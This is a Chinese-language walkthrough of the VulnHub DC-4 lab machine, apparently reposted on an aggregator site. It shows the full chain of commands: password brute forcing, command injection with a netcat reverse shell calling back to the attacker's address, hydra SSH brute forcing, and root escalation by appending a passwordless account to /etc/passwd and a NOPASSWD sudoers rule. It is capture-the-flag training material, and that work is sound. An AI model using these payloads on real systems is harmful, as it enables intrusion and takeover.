VulnHub系列 DC-4靶机 渗透详细过程 | 红队打靶

2024-04-18 04:20

本文主要是介绍VulnHub系列 DC-4靶机 渗透详细过程 | 红队打靶,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

VulnHub系列 DC-4靶机详细渗透测试过程

目录

  • VulnHub系列 DC-4靶机详细渗透测试过程
    • 一、将靶机导入到虚拟机当中
    • 二、渗透流程
      • 主机发现
      • 端口扫描
      • Web渗透
        • 暴力破解
        • 命令执行
        • 反弹shell
        • SSH暴力破解
        • 提权

一、将靶机导入到虚拟机当中

靶机地址:

https://download.vulnhub.com/dc/DC-4.zip

image-20240416231351749

二、渗透流程

主机发现

使用arp-scan命令或者nmap命令进行主机发现

image-20240416232834564

端口扫描

nmap -p- 192.168.43.27

image-20240416233010321

开放了22端口和80端口,可以再扫一下服务

nmap -p80,22 -sV -A 192.168.43.27

image-20240416233100055

识别一下web服务,看有什么信息

whatweb http://192.168.43.27

image-20240416233151791

并没有什么有价值的东西可利用,接下来访问Web界面

Web渗透

暴力破解

来到web界面,发现为登录界面,根据页面提示为管理员登录,但是通过简单信息收集并没有什么有效的信息,那么直接进行弱口令暴力破解

image-20240416234142112

image-20240416234241987

输入用户名admin,密码随意,抓取登录数据包,进行暴力破解

image-20240416234626837

发送请求,等待即可,根据响应大小判断得到结果,密码为happy

image-20240416234912020

命令执行

回到后台,等登录即可,进入后台,发现有命令工具,进入查看,点击run,发现执行了ls -l命令得回显内容,抓包看一下

image-20240416235311864

image-20240416235358848

image-20240416235846066

尝试将命令换成其他命令,如whoami,观察是否回显,直接可反弹shell

成功回显,接下来进行反弹shell操作,通过nc反弹

反弹shell

image-20240416235928239

radio=nc+-e+/bin/bash+192.168.43.105+8888&submit=%E8%B7%91

image-20240417000050642

kail端开启nc监听,成功接收到shell

image-20240417000141433

获取一个稳定shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20240417000227434

观察当前目录下没有什么可用可看的文件,回答家目录查看一下,有无可用的信息

SSH暴力破解

到/home目录下发现有三个用户的家目录,那么我们依次进入,发现只有jim的家目录不为空,其他两个家目录都为空

image-20240417000322478

/home/jim目录下有三个文件,分别查看一下

image-20240417000517014

image-20240417000933407

通过test.sh脚本的提示信息,再加上查看发现的backups目录当中有密码信息,通过我们得到的三个用户名信息,再加上这个密码信息,可以尝试ssh爆破登录,观察是否可成功爆破出ssh用户的登录密码

先将获取的用户名和密码分别保存到文本文件当中,接下来进行爆破

hydra -L user.txt -P passwd.txt ssh://192.168.43.27

image-20240417000706852

通过ssh爆破,成功爆破出jim的ssh登录密码,接下来我们以用户名jim远程登录到靶机当中,进行下一步的操作

image-20240417001448887

远程登录

image-20240417001509925

查找一下目录,看有无重要信息

通过仔细观察我们发现有一个邮件,我们查看一下

image-20240417003158735

image-20240417001659032

去往此目录,查看jim文件得内容信息,发现charles发来的邮件,并有连接密码

image-20240417001727165

得到charles的ssh远程登录密码,进行远程登录操作

image-20240417001832760

然后我们再次通过charles用户进行远程登录,成功登录,发现也有邮件,查看一下,并无有用的信息

image-20240417002103968

image-20240417002140887

提权

接下来进行提权,提权三步走

//查找suid权限的有无可利用
find / -perm -u=s -type f 2>/dev/null

image-20240417002430209

image-20240417003305131

su和sudo可利用一下,但是均没成功

image-20240417002526943

image-20240417003326097

//列出目前用户可执行与无法执行的指令;
sudo -l 查看

image-20240417003432747

发现在charles当中的sudo -l命令当中存在以root权限执行的命令

image-20240417003418001

查看此命令帮助,如何使用

teehee --help

image-20240417003837462

翻译:我们使用-a参数

image-20240417003927416

那么接下来我们可以直接向/etc/passwd 文件当中写入,查看一下/etc/passwd文件信息

image-20240417004034359

//空密码,直接追加到/etc/passwd
echo "admin::0:0:admin:/root:/bin/bash" | sudo teehee -a /etc/passwd或 修改charles权限,给予"为所欲为"权限
echo "charles ALL=(ALL:ALL)NOPASSWD:ALL" | sudo teehee -a /etc/sudoers"

image-20240417004126373

image-20240417004138878

直接切换admin用户,发现charles无法切换,换jim用户切换成功,成功提权

su - admin

image-20240417004259456

jim用户切换成功:

成功提权,通关

image-20240417004242266

文章不妥之处,欢迎批评指正!

这篇关于VulnHub系列 DC-4靶机 渗透详细过程 | 红队打靶的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/913747

相关文章

浅析Spring Security认证过程

类图 为了方便理解Spring Security认证流程,特意画了如下的类图,包含相关的核心认证类 概述 核心验证器 AuthenticationManager 该对象提供了认证方法的入口,接收一个Authentiaton对象作为参数; public interface AuthenticationManager {Authentication authenticate(Authenti

Spring Security 从入门到进阶系列教程

Spring Security 入门系列 《保护 Web 应用的安全》 《Spring-Security-入门(一):登录与退出》 《Spring-Security-入门(二):基于数据库验证》 《Spring-Security-入门(三):密码加密》 《Spring-Security-入门(四):自定义-Filter》 《Spring-Security-入门(五):在 Sprin

作业提交过程之HDFSMapReduce

作业提交全过程详解 (1)作业提交 第1步:Client调用job.waitForCompletion方法,向整个集群提交MapReduce作业。 第2步:Client向RM申请一个作业id。 第3步:RM给Client返回该job资源的提交路径和作业id。 第4步:Client提交jar包、切片信息和配置文件到指定的资源提交路径。 第5步:Client提交完资源后,向RM申请运行MrAp

科研绘图系列:R语言扩展物种堆积图(Extended Stacked Barplot)

介绍 R语言的扩展物种堆积图是一种数据可视化工具,它不仅展示了物种的堆积结果,还整合了不同样本分组之间的差异性分析结果。这种图形表示方法能够直观地比较不同物种在各个分组中的显著性差异,为研究者提供了一种有效的数据解读方式。 加载R包 knitr::opts_chunk$set(warning = F, message = F)library(tidyverse)library(phyl

【机器学习】高斯过程的基本概念和应用领域以及在python中的实例

引言 高斯过程(Gaussian Process,简称GP)是一种概率模型,用于描述一组随机变量的联合概率分布,其中任何一个有限维度的子集都具有高斯分布 文章目录 引言一、高斯过程1.1 基本定义1.1.1 随机过程1.1.2 高斯分布 1.2 高斯过程的特性1.2.1 联合高斯性1.2.2 均值函数1.2.3 协方差函数(或核函数) 1.3 核函数1.4 高斯过程回归(Gauss

【生成模型系列(初级)】嵌入(Embedding)方程——自然语言处理的数学灵魂【通俗理解】

【通俗理解】嵌入(Embedding)方程——自然语言处理的数学灵魂 关键词提炼 #嵌入方程 #自然语言处理 #词向量 #机器学习 #神经网络 #向量空间模型 #Siri #Google翻译 #AlexNet 第一节:嵌入方程的类比与核心概念【尽可能通俗】 嵌入方程可以被看作是自然语言处理中的“翻译机”,它将文本中的单词或短语转换成计算机能够理解的数学形式,即向量。 正如翻译机将一种语言

flume系列之:查看flume系统日志、查看统计flume日志类型、查看flume日志

遍历指定目录下多个文件查找指定内容 服务器系统日志会记录flume相关日志 cat /var/log/messages |grep -i oom 查找系统日志中关于flume的指定日志 import osdef search_string_in_files(directory, search_string):count = 0

沁恒CH32在MounRiver Studio上环境配置以及使用详细教程

目录 1.  RISC-V简介 2.  CPU架构现状 3.  MounRiver Studio软件下载 4.  MounRiver Studio软件安装 5.  MounRiver Studio软件介绍 6.  创建工程 7.  编译代码 1.  RISC-V简介         RISC就是精简指令集计算机(Reduced Instruction SetCom

arduino ide安装详细步骤

​ 大家好,我是程序员小羊! 前言: Arduino IDE 是一个专为编程 Arduino 微控制器设计的集成开发环境,使用起来非常方便。下面将介绍如何在不同平台上安装 Arduino IDE 的详细步骤,包括 Windows、Mac 和 Linux 系统。 一、在 Windows 上安装 Arduino IDE 1. 下载 Arduino IDE 打开 Arduino 官网

Solr 使用Facet分组过程中与分词的矛盾解决办法

对于一般查询而言  ,  分词和存储都是必要的  .  比如  CPU  类型  ”Intel  酷睿  2  双核  P7570”,  拆分成  ”Intel”,”  酷睿  ”,”P7570”  这样一些关键字并分别索引  ,  可能提供更好的搜索体验  .  但是如果将  CPU  作为 Facet  字段  ,  最好不进行分词  .  这样就造成了矛盾  ,  解决方法